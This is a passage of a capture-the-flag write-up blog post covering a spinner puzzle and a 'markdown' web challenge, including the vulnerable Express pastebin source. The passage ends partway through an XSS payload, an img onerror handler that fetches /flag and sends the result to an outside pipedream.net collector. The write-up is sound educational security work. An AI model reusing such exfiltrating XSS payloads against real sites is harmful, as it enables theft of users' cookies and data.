punctuation\">.</span>value\n    spinner<span class=\"token punctuation\">.</span>style<span class=\"token punctuation\">.</span>transform <span class=\"token operator\">=</span> <span class=\"token template-string\"><span class=\"token template-punctuation string\">`</span><span class=\"token string\">rotate(</span><span class=\"token interpolation\"><span class=\"token interpolation-punctuation punctuation\">${</span>degrees<span class=\"token interpolation-punctuation punctuation\">}</span></span><span class=\"token string\">deg)</span><span class=\"token template-punctuation string\">`</span></span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">const</span> <span class=\"token function-variable function\">down</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=></span> <span class=\"token punctuation\">{</span>\n    state<span class=\"token punctuation\">.</span>dragging <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">const</span> <span class=\"token function-variable function\">move</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token parameter\">e</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=></span> <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token operator\">!</span>state<span class=\"token punctuation\">.</span>dragging<span class=\"token punctuation\">)</span> <span class=\"token keyword\">return</span>\n\n    <span class=\"token keyword\">const</span> spinner <span class=\"token operator\">=</span> document<span class=\"token punctuation\">.</span><span class=\"token function\">querySelector</span><span class=\"token punctuation\">(</span><span class=\"token string\">'.spinner'</span><span class=\"token punctuation\">)</span>\n    <span class=\"token keyword\">const</span> center <span class=\"token operator\">=</span> <span class=\"token punctuation\">{</span>\n        <span class=\"token literal-property property\">x</span><span class=\"token operator\">:</span> spinner<span class=\"token punctuation\">.</span>offsetLeft <span class=\"token operator\">+</span> spinner<span class=\"token punctuation\">.</span>offsetWidth <span class=\"token operator\">/</span> <span class=\"token number\">2</span><span class=\"token punctuation\">,</span>\n        <span class=\"token literal-property property\">y</span><span class=\"token operator\">:</span> spinner<span class=\"token punctuation\">.</span>offsetTop <span class=\"token operator\">+</span> spinner<span class=\"token punctuation\">.</span>offsetHeight <span class=\"token operator\">/</span> <span class=\"token number\">2</span><span class=\"token punctuation\">,</span>\n    <span class=\"token punctuation\">}</span>\n    <span class=\"token keyword\">const</span> dy <span class=\"token operator\">=</span> e<span class=\"token punctuation\">.</span>clientY <span class=\"token operator\">-</span> center<span class=\"token punctuation\">.</span>y\n    <span class=\"token keyword\">const</span> dx <span class=\"token operator\">=</span> e<span class=\"token punctuation\">.</span>clientX <span class=\"token operator\">-</span> center<span class=\"token punctuation\">.</span>x\n    <span class=\"token keyword\">const</span> angle <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span>Math<span class=\"token punctuation\">.</span><span class=\"token function\">atan2</span><span class=\"token punctuation\">(</span>dy<span class=\"token punctuation\">,</span> dx<span class=\"token punctuation\">)</span> <span class=\"token operator\">*</span> <span class=\"token number\">180</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">/</span> Math<span class=\"token punctuation\">.</span><span class=\"token constant\">PI</span>\n\n    <span class=\"token keyword\">const</span> value <span class=\"token operator\">=</span> angle <span class=\"token operator\">&lt;</span> <span class=\"token number\">0</span> <span class=\"token operator\">?</span> <span class=\"token number\">360</span> <span class=\"token operator\">+</span> angle <span class=\"token operator\">:</span> angle\n    <span class=\"token keyword\">const</span> change <span class=\"token operator\">=</span> value <span class=\"token operator\">-</span> state<span class=\"token punctuation\">.</span>value\n\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token number\">0</span> <span class=\"token operator\">&lt;</span> change <span class=\"token operator\">&amp;&amp;</span> change <span class=\"token operator\">&lt;</span> <span class=\"token number\">180</span><span class=\"token punctuation\">)</span> state<span class=\"token punctuation\">.</span>total <span class=\"token operator\">+=</span> change\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token number\">0</span> <span class=\"token operator\">></span> change <span class=\"token operator\">&amp;&amp;</span> change <span class=\"token operator\">></span> <span class=\"token operator\">-</span><span class=\"token number\">180</span><span class=\"token punctuation\">)</span> state<span class=\"token punctuation\">.</span>total <span class=\"token operator\">+=</span> change\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>change <span class=\"token operator\">></span> <span class=\"token number\">180</span><span class=\"token punctuation\">)</span> state<span class=\"token punctuation\">.</span>total <span class=\"token operator\">-=</span> <span class=\"token number\">360</span> <span class=\"token operator\">-</span> change\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>change <span class=\"token operator\">&lt;</span> <span class=\"token operator\">-</span><span class=\"token number\">180</span><span class=\"token punctuation\">)</span> state<span class=\"token punctuation\">.</span>total <span class=\"token operator\">+=</span> <span class=\"token number\">360</span> <span class=\"token operator\">+</span> change\n\n    state<span class=\"token punctuation\">.</span>value <span class=\"token operator\">=</span> value\n\n    <span class=\"token function\">draw</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n    <span class=\"token function\">message</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">const</span> <span class=\"token function-variable function\">up</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=></span> <span class=\"token punctuation\">{</span>\n    state<span class=\"token punctuation\">.</span>dragging <span class=\"token operator\">=</span> <span class=\"token boolean\">false</span>\n<span class=\"token punctuation\">}</span>\n\ndocument<span class=\"token punctuation\">.</span><span class=\"token function\">querySelector</span><span class=\"token punctuation\">(</span><span class=\"token string\">'.handle'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">addEventListener</span><span class=\"token punctuation\">(</span><span class=\"token string\">'mousedown'</span><span class=\"token punctuation\">,</span> down<span class=\"token punctuation\">)</span>\nwindow<span class=\"token punctuation\">.</span><span class=\"token function\">addEventListener</span><span class=\"token punctuation\">(</span><span class=\"token string\">'mousemove'</span><span class=\"token punctuation\">,</span> move<span class=\"token punctuation\">)</span>\nwindow<span class=\"token punctuation\">.</span><span class=\"token function\">addEventListener</span><span class=\"token punctuation\">(</span><span class=\"token string\">'mouseup'</span><span class=\"token punctuation\">,</span> up<span class=\"token punctuation\">)</span>\nwindow<span class=\"token punctuation\">.</span><span class=\"token function\">addEventListener</span><span class=\"token punctuation\">(</span><span class=\"token string\">'blur'</span><span class=\"token punctuation\">,</span> up<span class=\"token punctuation\">)</span>\nwindow<span class=\"token punctuation\">.</span><span class=\"token function\">addEventListener</span><span class=\"token punctuation\">(</span><span class=\"token string\">'mouseleave'</span><span class=\"token punctuation\">,</span> up<span class=\"token punctuation\">)</span></code></pre></div>\n<p>I obtained the flag by directly overwriting the value using the browser’s developer tools.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/485a71c56b0982c5a5f6cf5713a69118/0fb99/image-20240525234850364.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 26.666666666666668%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAsUlEQVQY03WQ2Q6DIBBF/RJ9s9LU2v6zP6WAGJe6vfrkMreIsSHG3uQwDJmcAA5+IRDtdZ4J47hX+9ysulmWxezjOAYLXnhHEcLnQxPC2QYOtqwroe+BsiR0HZn+EB3YQtf1EAQMN9+HrzkJCdNEEIKMsK7tW14LPc/DnTEtDQwOLjIMhLaFfjYucxYyW1hXFZRSyHMFzjmklMgyjqIowdMUSZJACgGuEZpP0+hvWP8Kv6FkT0QB67N2AAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/485a71c56b0982c5a5f6cf5713a69118/8ac56/image-20240525234850364.webp 240w,\n/static/485a71c56b0982c5a5f6cf5713a69118/d3be9/image-20240525234850364.webp 480w,\n/static/485a71c56b0982c5a5f6cf5713a69118/e46b2/image-20240525234850364.webp 960w,\n/static/485a71c56b0982c5a5f6cf5713a69118/32b94/image-20240525234850364.webp 965w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/485a71c56b0982c5a5f6cf5713a69118/8ff5a/image-20240525234850364.png 240w,\n/static/485a71c56b0982c5a5f6cf5713a69118/e85cb/image-20240525234850364.png 480w,\n/static/485a71c56b0982c5a5f6cf5713a69118/d9199/image-20240525234850364.png 960w,\n/static/485a71c56b0982c5a5f6cf5713a69118/0fb99/image-20240525234850364.png 965w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/485a71c56b0982c5a5f6cf5713a69118/d9199/image-20240525234850364.png\"\n            alt=\"image-20240525234850364\"\n            title=\"image-20240525234850364\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"markdownweb\" style=\"position:relative;\"><a href=\"#markdownweb\" aria-label=\"markdownweb permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>markdown(Web)</h2>\n<blockquote>\n<p>My friend made an app for sharing their notes!</p>\n</blockquote>\n<p>Accessing the challenge server launches a service that renders submitted Markdown as a web page.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 896px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/33a632822dbc653d60f72e90a0dc0127/4c42d/image-20240526003810635.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 20.833333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAiElEQVQY062Oyw7CIBRE+f//qonpF9TYjUAf1gYoeCmPZKTEuHCrk5zM3LO67NJ1aJoT2vaMJxF+DfPeQylVMcZUtNYfvp16u81uIE+g8kQIAfu+I+cMNk8Trn0PKWVlLPdwbCEhOAcviLKPlkLgVnoYRtyXBev6gHMOKSVYaxFjBDsEkce/8gJ0FzSiO5xcxAAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/33a632822dbc653d60f72e90a0dc0127/8ac56/image-20240526003810635.webp 240w,\n/static/33a632822dbc653d60f72e90a0dc0127/d3be9/image-20240526003810635.webp 480w,\n/static/33a632822dbc653d60f72e90a0dc0127/c1a89/image-20240526003810635.webp 896w\"\n              sizes=\"(max-width: 896px) 100vw, 896px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/33a632822dbc653d60f72e90a0dc0127/8ff5a/image-20240526003810635.png 240w,\n/static/33a632822dbc653d60f72e90a0dc0127/e85cb/image-20240526003810635.png 480w,\n/static/33a632822dbc653d60f72e90a0dc0127/4c42d/image-20240526003810635.png 896w\"\n            sizes=\"(max-width: 896px) 100vw, 896px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/33a632822dbc653d60f72e90a0dc0127/4c42d/image-20240526003810635.png\"\n            alt=\"image-20240526003810635\"\n            title=\"image-20240526003810635\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>There is also an admin access tool available.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/a853987be82290ac5786616c81a8290e/b1584/image-20240526003823917.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 24.166666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA9ElEQVQY023Py0rDQBQG4DxGhHaSyWXGkExj01BsOhCC71BU1IK4kWJLXsWFOx9JXLhTK+3Ot/idOW0plS4+zpzhP3NxfN+HxTkndh0EAeq6htYaVVVhPLY0mqZBWZYH+f8cKSWsOBZbMYQQxDODkentnpSCDpLylPp9fj8ThiGcon+GQdGHUhlUllLNTM3zHmazRyzmT6RtW0wml0jTZJNV6Sa/1TN79lKH8RiMR/BMJYFA1wshEoW39w98fq/wtVzhZ/2L55dXdBinDNnNEPMDbl7oDm5wUlwf1R1OEel75BcPYOdTdIa3cI9mr+CWd2DJCH/uCaNhtwdZMwAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/a853987be82290ac5786616c81a8290e/8ac56/image-20240526003823917.webp 240w,\n/static/a853987be82290ac5786616c81a8290e/d3be9/image-20240526003823917.webp 480w,\n/static/a853987be82290ac5786616c81a8290e/e46b2/image-20240526003823917.webp 960w,\n/static/a853987be82290ac5786616c81a8290e/ec5ae/image-20240526003823917.webp 1342w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/a853987be82290ac5786616c81a8290e/8ff5a/image-20240526003823917.png 240w,\n/static/a853987be82290ac5786616c81a8290e/e85cb/image-20240526003823917.png 480w,\n/static/a853987be82290ac5786616c81a8290e/d9199/image-20240526003823917.png 960w,\n/static/a853987be82290ac5786616c81a8290e/b1584/image-20240526003823917.png 1342w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/a853987be82290ac5786616c81a8290e/d9199/image-20240526003823917.png\"\n            alt=\"image-20240526003823917\"\n            title=\"image-20240526003823917\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Looking at the application source code, we can see that the flag is stored in the admin’s cookie.</p>\n<div class=\"gatsby-highlight\" data-language=\"javascript\"><pre class=\"language-javascript\"><code class=\"language-javascript\"><span class=\"token keyword\">const</span> crypto <span class=\"token operator\">=</span> <span class=\"token function\">require</span><span class=\"token punctuation\">(</span><span class=\"token string\">'crypto'</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">const</span> express <span class=\"token operator\">=</span> <span class=\"token function\">require</span><span class=\"token punctuation\">(</span><span class=\"token string\">'express'</span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">const</span> app <span class=\"token operator\">=</span> <span class=\"token function\">express</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">const</span> posts <span class=\"token operator\">=</span> <span class=\"token keyword\">new</span> <span class=\"token class-name\">Map</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\napp<span class=\"token punctuation\">.</span><span class=\"token function\">use</span><span class=\"token punctuation\">(</span>express<span class=\"token punctuation\">.</span><span class=\"token function\">urlencoded</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">{</span> <span class=\"token literal-property property\">extended</span><span class=\"token operator\">:</span> <span class=\"token boolean\">false</span> <span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\napp<span class=\"token punctuation\">.</span><span class=\"token function\">get</span><span class=\"token punctuation\">(</span><span class=\"token string\">'/'</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">(</span><span class=\"token parameter\">_req<span class=\"token punctuation\">,</span> res</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=></span> <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">const</span> placeholder <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span>\n        <span class=\"token string\">'# Note title'</span><span class=\"token punctuation\">,</span>\n        <span class=\"token string\">'Content of the note. You can use *italics*!'</span><span class=\"token punctuation\">,</span>\n    <span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span><span class=\"token function\">join</span><span class=\"token punctuation\">(</span><span class=\"token string\">'\\n'</span><span class=\"token punctuation\">)</span>\n\n    res<span class=\"token punctuation\">.</span><span class=\"token function\">type</span><span class=\"token punctuation\">(</span><span class=\"token string\">'text/html'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">end</span><span class=\"token punctuation\">(</span><span class=\"token template-string\"><span class=\"token template-punctuation string\">`</span><span class=\"token string\">\n        &lt;link rel=\"stylesheet\" href=\"/style.css\">\n        &lt;div class=\"content\">\n            &lt;h1>Pastebin&lt;/h1>\n            &lt;form action=\"/create\" method=\"POST\">\n                &lt;textarea name=\"content\"></span><span class=\"token interpolation\"><span class=\"token interpolation-punctuation punctuation\">${</span>placeholder<span class=\"token interpolation-punctuation punctuation\">}</span></span><span class=\"token string\">&lt;/textarea>\n                &lt;button type=\"submit\">Create&lt;/button>\n            &lt;/form>\n        &lt;/div>\n    </span><span class=\"token template-punctuation string\">`</span></span><span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span>\n\napp<span class=\"token punctuation\">.</span><span class=\"token function\">get</span><span class=\"token punctuation\">(</span><span class=\"token string\">'/flag'</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">(</span><span class=\"token parameter\">req<span class=\"token punctuation\">,</span> res</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=></span> <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">const</span> cookie <span class=\"token operator\">=</span> req<span class=\"token punctuation\">.</span>headers<span class=\"token punctuation\">.</span>cookie <span class=\"token operator\">??</span> <span class=\"token string\">''</span>\n    res<span class=\"token punctuation\">.</span><span class=\"token function\">type</span><span class=\"token punctuation\">(</span><span class=\"token string\">'text/plain'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">end</span><span class=\"token punctuation\">(</span>\n        cookie<span class=\"token punctuation\">.</span><span class=\"token function\">includes</span><span class=\"token punctuation\">(</span>process<span class=\"token punctuation\">.</span>env<span class=\"token punctuation\">.</span><span class=\"token constant\">TOKEN</span><span class=\"token punctuation\">)</span>\n        <span class=\"token operator\">?</span> process<span class=\"token punctuation\">.</span>env<span class=\"token punctuation\">.</span><span class=\"token constant\">FLAG</span>\n        <span class=\"token operator\">:</span> <span class=\"token string\">'no flag for you'</span>\n    <span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span>\n\napp<span class=\"token punctuation\">.</span><span class=\"token function\">get</span><span class=\"token punctuation\">(</span><span class=\"token string\">'/view/:id'</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">(</span><span class=\"token parameter\">_req<span class=\"token punctuation\">,</span> res</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=></span> <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">const</span> marked <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span>\n        <span class=\"token string\">'https://cdnjs.cloudflare.com/ajax/libs/marked/4.2.2/marked.min.js'</span>\n    <span class=\"token punctuation\">)</span>\n\n    res<span class=\"token punctuation\">.</span><span class=\"token function\">type</span><span class=\"token punctuation\">(</span><span class=\"token string\">'text/html'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">end</span><span class=\"token punctuation\">(</span><span class=\"token template-string\"><span class=\"token template-punctuation string\">`</span><span class=\"token string\">\n        &lt;link rel=\"stylesheet\" href=\"/style.css\">\n        &lt;div class=\"content\">\n        &lt;/div>\n        &lt;script src=\"</span><span class=\"token interpolation\"><span class=\"token interpolation-punctuation punctuation\">${</span>marked<span class=\"token interpolation-punctuation punctuation\">}</span></span><span class=\"token string\">\">&lt;/script>\n        &lt;script>\n            const content = document.querySelector('.content')\n            const id = document.location.pathname.split('/').pop()\n\n            delete (async () => {\n                const response = await fetch(\\`/content/\\${id}\\`)\n                const text = await response.text()\n                content.innerHTML = marked.parse(text)\n            })()\n        &lt;/script>\n    </span><span class=\"token template-punctuation string\">`</span></span><span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span>\n\napp<span class=\"token punctuation\">.</span><span class=\"token function\">post</span><span class=\"token punctuation\">(</span><span class=\"token string\">'/create'</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">(</span><span class=\"token parameter\">req<span class=\"token punctuation\">,</span> res</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=></span> <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">const</span> data <span class=\"token operator\">=</span> req<span class=\"token punctuation\">.</span>body<span class=\"token punctuation\">.</span>content <span class=\"token operator\">??</span> <span class=\"token string\">''</span>\n    <span class=\"token keyword\">const</span> id <span class=\"token operator\">=</span> crypto<span class=\"token punctuation\">.</span><span class=\"token function\">randomBytes</span><span class=\"token punctuation\">(</span><span class=\"token number\">8</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">toString</span><span class=\"token punctuation\">(</span><span class=\"token string\">'hex'</span><span class=\"token punctuation\">)</span>\n    posts<span class=\"token punctuation\">.</span><span class=\"token function\">set</span><span class=\"token punctuation\">(</span>id<span class=\"token punctuation\">,</span> data<span class=\"token punctuation\">)</span>\n    res<span class=\"token punctuation\">.</span><span class=\"token function\">redirect</span><span class=\"token punctuation\">(</span><span class=\"token template-string\"><span class=\"token template-punctuation string\">`</span><span class=\"token string\">/view/</span><span class=\"token interpolation\"><span class=\"token interpolation-punctuation punctuation\">${</span>id<span class=\"token interpolation-punctuation punctuation\">}</span></span><span class=\"token template-punctuation string\">`</span></span><span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span>\n\napp<span class=\"token punctuation\">.</span><span class=\"token function\">get</span><span class=\"token punctuation\">(</span><span class=\"token string\">'/content/:id'</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">(</span><span class=\"token parameter\">req<span class=\"token punctuation\">,</span> res</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=></span> <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">const</span> id <span class=\"token operator\">=</span> req<span class=\"token punctuation\">.</span>params<span class=\"token punctuation\">.</span>id\n    <span class=\"token keyword\">const</span> data <span class=\"token operator\">=</span> posts<span class=\"token punctuation\">.</span><span class=\"token function\">get</span><span class=\"token punctuation\">(</span>id<span class=\"token punctuation\">)</span> <span class=\"token operator\">??</span> <span class=\"token string\">''</span>\n    res<span class=\"token punctuation\">.</span><span class=\"token function\">type</span><span class=\"token punctuation\">(</span><span class=\"token string\">'text/plain'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">end</span><span class=\"token punctuation\">(</span>data<span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span>\n\napp<span class=\"token punctuation\">.</span><span class=\"token function\">get</span><span class=\"token punctuation\">(</span><span class=\"token string\">'/style.css'</span><span class=\"token punctuation\">,</span> <span class=\"token punctuation\">(</span><span class=\"token parameter\">_req<span class=\"token punctuation\">,</span> res</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">=></span> <span class=\"token punctuation\">{</span>\n    res<span class=\"token punctuation\">.</span><span class=\"token function\">type</span><span class=\"token punctuation\">(</span><span class=\"token string\">'text/css'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">end</span><span class=\"token punctuation\">(</span><span class=\"token template-string\"><span class=\"token template-punctuation string\">`</span><span class=\"token string\">\n        * {\n          font-family: system-ui, -apple-system, BlinkMacSystemFont,\n            'Segoe UI', Roboto, 'Helvetica Neue', sans-serif;\n          box-sizing: border-box;\n        }\n\n        html,\n        body {\n          margin: 0;\n        }\n\n        .content {\n          padding: 2rem;\n          width: 90%;\n          max-width: 900px;\n          margin: auto;\n        }\n\n        input:not([type='submit']) {\n          width: 100%;\n          padding: 8px;\n          margin: 8px 0;\n        }\n\n        textarea {\n          width: 100%;\n          padding: 8px;\n          margin: 8px 0;\n          resize: vertical;\n          font-family: monospace;\n        }\n\n        input[type='submit'] {\n          margin-bottom: 16px;\n        }\n\n\n    </span><span class=\"token template-punctuation string\">`</span></span><span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span>\n\napp<span class=\"token punctuation\">.</span><span class=\"token function\">listen</span><span class=\"token punctuation\">(</span><span class=\"token number\">3000</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>The plan was to trigger XSS via the submitted Markdown.</p>\n<p>However, when scripts are injected via <code class=\"language-text\">innerHTML</code> after the page has loaded, browsers typically do not execute them directly.</p>\n<p>To work around this, I referenced the following article and used the <code class=\"language-text\">onerror</code> attribute on an <code class=\"language-text\">img</code> tag to run arbitrary JavaScript.</p>\n<p>Reference: <a href=\"https://qiita.com/koki-sato/items/86b02f72cb3d303caa78\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">Creating CTF Challenges for In-Team CTF - XSS Edition #JavaScript - Qiita</a></p>\n<p>I retrieved the flag by submitting the following payload.</p>\n<div class=\"gatsby-highlight\" data-language=\"html\"><pre class=\"language-html\"><code class=\"language-html\"><span class=\"token tag\"><span class=\"token tag\"><span class=\"token punctuation\">&lt;</span>img</span> <span class=\"token attr-name\">src</span><span class=\"token attr-value\"><span class=\"token punctuation attr-equals\">=</span><span class=\"token punctuation\">\"</span>x<span class=\"token punctuation\">\"</span></span> <span class=\"token special-attr\"><span class=\"token attr-name\">onerror</span><span class=\"token attr-value\"><span class=\"token punctuation attr-equals\">=</span><span class=\"token punctuation\">'</span><span class=\"token value javascript language-javascript\"><span class=\"token function\">fetch</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"/flag\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">then</span><span class=\"token punctuation\">(</span><span class=\"token parameter\">e</span><span class=\"token operator\">=></span>e<span class=\"token punctuation\">.</span><span class=\"token function\">text</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">then</span><span class=\"token punctuation\">(</span><span class=\"token parameter\">e</span><span class=\"token operator\">=></span><span class=\"token punctuation\">{</span>console<span class=\"token punctuation\">.</span><span class=\"token function\">log</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"GET response HTML:\"</span><span class=\"token punctuation\">,</span>e<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span><span class=\"token keyword\">let</span> t<span class=\"token operator\">=</span><span class=\"token function\">encodeURIComponent</span><span class=\"token punctuation\">(</span>e<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span>n<span class=\"token operator\">=</span><span class=\"token template-string\"><span class=\"token template-punctuation string\">`</span><span class=\"token string\">https://eoxwstthee5l1zi.m.pipedream.net?query=</span><span class=\"token interpolation\"><span class=\"token interpolation-punctuation punctuation\">${</span>t<span class=\"token interpolation-punctuation punctuation\">}</span></span><span class=\"token template-punctuation string\">`</span></span><span class=\"token punctuation\">;</span><span class=\"token keyword\">return</span> <span class=\"token function\">fetch</span><span class=\"token punctuation\">(</span>n<span class=\"token punctuation\">)</span><span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">then</span><span class=\"token punctuation\">(</span><span class=\"token parameter\">e</span><span class=\"token operator\">=></span>e<span class=\"token punctuation\">.</span><span class=\"token function\">text</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token function\">then</span><span class=\"token punctuation\">(</span><span class=\"token parameter\">e</span><span class=\"token operator\">=></span><span class=\"token punctuation\">{</span>console<span class=\"token punctuation\">.</span><span class=\"token function\">log</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"GET response from target URL:\"</span><span class=\"token punctuation\">,</span>e<span class=\"token punctuation\">)</span><span class=\"token punctuation\">}</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span></span><span class=\"token punctuation\">'</span></span></span><span class=\"token 